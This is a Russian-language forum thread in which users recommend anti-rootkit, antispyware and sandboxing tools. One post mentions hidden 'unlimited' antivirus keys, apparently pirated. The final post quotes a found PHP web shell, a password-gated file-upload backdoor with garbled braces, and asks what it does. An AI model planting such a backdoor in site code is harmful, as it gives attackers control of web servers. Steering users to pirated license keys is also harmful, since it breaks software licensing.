Форум Приднестровья, форум ПМР

- Программы, софт (http://forum-pmr.net/forumdisplay.php?f=41)

- - Защита от rootkit-ов (http://forum-pmr.net/showthread.php?t=108365)

Защита от rootkit-ов

Какой есть софт или антивирусы от rootkit?
Находит ли их нод?

я пользуюсь avz а тебе что гугль отключили или до сих пор вирусы переустановкой ос решал?

Ставьте антишпион дополнительно к антивирусу :)

Периодически приходится вполне живую винду чистить от подарков с разных сайтов или халявного софта с тулбарами.

Утилит я протестировал много. Остановился на двух.

Это spywareterminator - бесплатная тулза против различного вебового дерьма.
Сканер + Монитор. То есть не только чистит, но и еще висит в памяти и отстреливает всякую нечесть.

http://www.pcrx.com/ru/spywareterminator/default.aspx

Malwarebytes - простенькая утилита сканер - прочищает всю дрянь которую можно наловить с веба.

http://www.malwarebytes.org/

Смотрю, что есть антируткиты:
AVZ
Eset SysInspector
GMER
KernelDetective
Malwarebytes
Online Solutions Autorun Manager
Panda Anti-Rootkit
Spywareterminator
Sophos Anti-Rootkit
SysReveal
Rootkit Unhooker
RootRepeal
Trend Micro RootkitBuster
Trojan Remover
VBA32 Antirootkit
Universal Virus Sniffer
XueTr

Так что выбор софта большой. Форумчане пользуются 3 из списка.

Вот сейчас пришлось проверить комп на предмет троянов, т.к. взломали и украли почтовый ящик.
UVS
AVZ
trojan remover
drweb cureit
hikack this
+ антивирус F-secure client secure (f-secure.com/en/web/business_global/support/downloads/-/carousel/view/73)
F-Secure Client Security 9.31 installer (.exe)
самый крутой антивирус из того что есть на рынке
говорят эта связка помогает в 99.99 процентов случаев.
и в отличии от касперского не глючит
по статистике делает все что любят у нас в росии - те касперы , ноды др веберы итд

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 2000 сообщение(ий)):

У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.

это ключики для антивиря по времени безлимитные и не банятся производителлем !

---------- Сообщение добавлено в 23:57 ---------- Предыдущее сообщение было в 23:35 ----------

Еще не помешает на компе установить
sandboxie.com/index.php?DownloadSandboxie - защищает компьютер ото всех нежелательных изменений, которые могли бы быть совершены активным содержимым сайтов.
Sandboxie - изменения связанные с использованием программы были сохранены в ограниченной среде (“песочница”), которая может быть позже удалена.

Цитата:

, т.к. взломали и украли почтовый ящик.

кто взломал, с какой целью и каким методом?

Скорее всего что то на компе было, из серии кейлогера, или файл передало. Троян что ли. Откуда я знаю.

Re: Защита от rootkit-ов

Пользуюсь ESET Smart Security 5 никаких проблем не было замечено

aibolit-for-windows - тема, находит хорошо в локальной копии файлов с сервака всякие уязвимости.

кто из вас так бухнул с отцом ?

Вот даже не очень понимаю, что делает такой скрипт трояна.
Вроде заливает файл на сайт, а какой?

Цитата:

<?php if(md5($_GET["ms-load"])=="22f0e6be002b2621c7b87b12e677d39e")**
$p=$_SERVER["DOCUMENT_ROOT"];
$tyuf=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data" method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$tyuf/" name="pt" type="text"><br>
<input type="submit" value="Upload">
$tend
HTML;
if (isset($_POST["pt"]))**
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]=="")**$uploadfile = $_FILES["file"]["name"];**
if (copy($_FILES["file"]["tmp_name"], $uploadfile))**
echo"uploaded:$uploadfilen";
echo"Size:".$_FILES["file"]["size"]."n";
**else **
print "Error:n";
**
**
**